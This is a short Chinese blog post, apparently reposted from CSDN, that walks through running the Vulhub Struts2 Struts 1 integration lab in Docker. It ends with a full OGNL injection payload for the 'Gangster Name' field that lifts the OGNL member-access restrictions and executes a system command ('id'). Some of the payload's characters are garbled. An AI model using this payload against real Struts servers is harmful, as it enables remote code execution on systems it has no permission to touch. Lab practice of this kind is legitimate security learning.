本文详细介绍了如何在Docker环境下搭建并运行Vulhub靶场,重点讲解了Struts1漏洞的利用过程,包括环境启动、访问路径及POC注入技巧。
我在docker中搭得的vulhub靶场
1.开启环境
命令
开启docker :service docker start
启动环境 :docker-compose up -d
2.环境启动好后访问http://your-ip:8080/showcase/
在这里插入图片描述
3.这个漏洞在integraton下的struts1处
在这里插入图片描述
4.访问Integration/Struts 1 Integration:
在这里插入图片描述
5.触发OGNL表达式的位置是Gangster Name这个表单,在此处填写poc即可
poc:%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)😦(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream())).(#q)}
在这里插入图片描述
————————————————
原文链接:https://blog.csdn.net/wodepzw/article/details/103141431
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
